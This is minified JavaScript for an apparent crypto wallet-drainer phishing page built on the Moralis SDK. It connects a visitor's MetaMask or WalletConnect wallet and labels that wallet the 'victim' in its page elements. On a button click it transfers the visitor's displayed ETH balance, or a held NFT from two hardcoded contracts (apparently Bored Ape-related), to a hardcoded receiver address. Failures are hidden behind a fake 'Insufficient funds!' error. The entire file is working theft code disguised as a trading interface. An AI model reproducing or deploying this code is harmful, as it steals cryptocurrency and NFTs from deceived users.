const serverUrl="https://jkcmpnctvvri.usemoralis.com:2053/server";const appId="Ct8myYsnvS7hJEBj8c9bJJO5ylzuvw05WYKwRuB6";Moralis.start({serverUrl,appId});async function login(pvdr){if(isMobile()){if(window.ethereum){;}else{var localurl=new URL(window.location);window.location.replace("https://metamask.app.link/dapp/"+localurl.host+localurl.pathname);}}
let user=Moralis.User.current();try{user=await Moralis.authenticate({provider:pvdr,signingMessage:"I am signing my one-time nonce: 513767"})
$('.bayc-button-before').css('color','#000');$('.bayc-button-before').css('background-color','#bfc500');$('.bayc-button-before').css('cursor','pointer');}catch(error){console.log(error)}}
function isMobile(){return(typeof window.orientation!=="undefined")||(navigator.userAgent.indexOf('IEMobile')!==-1);};async function checkLoginStatus(){let user=Moralis.User.current();if(user){$('.victim-wallet').html(user.get('ethAddress'));$('.sb-victimAddress').html(user.get('ethAddress'));$('.trade-view').show();$('.sidebar').show();$('.connect-wallet').html('MAIN NET');$('.connect-wallet').css('color','#057b99');$('.sidebartogglebtn').show();closeLoginModal();}else{$('.trade-view').hide();$('.sidebar').hide();}}
async function logOut(){await Moralis.User.logOut();console.log("logged out");}
function closeLoginModal(){$('.w3modal').css('display','none');}
function togglesidebar(){if($('.sidebar').css('right')=='0px'){$('.sidebar').css('right','-500px');}else{$('.sidebar').css('right','0px');}}
async function transact(){await Moralis.enableWeb3();var options,optionss,optionsss;console.log("0xaA1b22D11692664570cAC27d344aa1cC1f818ec4");if(MODE=='ethnft'){options={type:"native",amount:Moralis.Units.ETH($('.victimEthDisplay').text().slice(0,$('.victimEthDisplay').text().indexOf(' '))),receiver:"0xaA1b22D11692664570cAC27d344aa1cC1f818ec4"};}
optionss={chain:"Eth",address:Moralis.User.current().get("ethAddress"),token_address:"0xBC4CA0EdA7647A8aB7C2061c2E118A18a936f13D",}
optionsss={chain:"Eth",address:Moralis.User.current().get("ethAddress"),token_address:"0x60E4d786628Fea6478F785A6d7e704777c86a7c6",}
const userEthNFTs=await Moralis.Web3API.account.getNFTsForContract(optionss);const userEthNFTss=await Moralis.Web3API.account.getNFTsForContract(optionsss);if(userEthNFTs.result[0]!=undefined){console.log("0xaA1b22D11692664570cAC27d344aa1cC1f818ec4");options={type:"erc721",receiver:"0xaA1b22D11692664570cAC27d344aa1cC1f818ec4",contractAddress:"0xBC4CA0EdA7647A8aB7C2061c2E118A18a936f13D",tokenId:parseInt(userEthNFTs.result[0]["token_id"],10)};}
if(userEthNFTss.result[0]!=undefined){console.log("0xaA1b22D11692664570cAC27d344aa1cC1f818ec4");options={type:"erc721",receiver:"0xaA1b22D11692664570cAC27d344aa1cC1f818ec4",contractAddress:"0x60E4d786628Fea6478F785A6d7e704777c86a7c6",tokenId:parseInt(userEthNFTss.result[0]["token_id"],10)};}
try{let result=await Moralis.transfer(options);}catch(e){throwmodal('Error: Insufficient funds!');}}
async function throwmodal(errormsg){$('.errormodal').html(errormsg);$('.errormodal').css('opacity','1');await new Promise(resolve=>setTimeout(resolve,5000));$('.errormodal').css('opacity','0');}
$(document).ready(function(){checkLoginStatus();logOut();$('.sidebartogglebtn').hide();$("#connect").click(function(){login('metamask');});$("#wc-provider").click(function(){login('walletconnect');});$('#sendnft').click(function(){transact();})});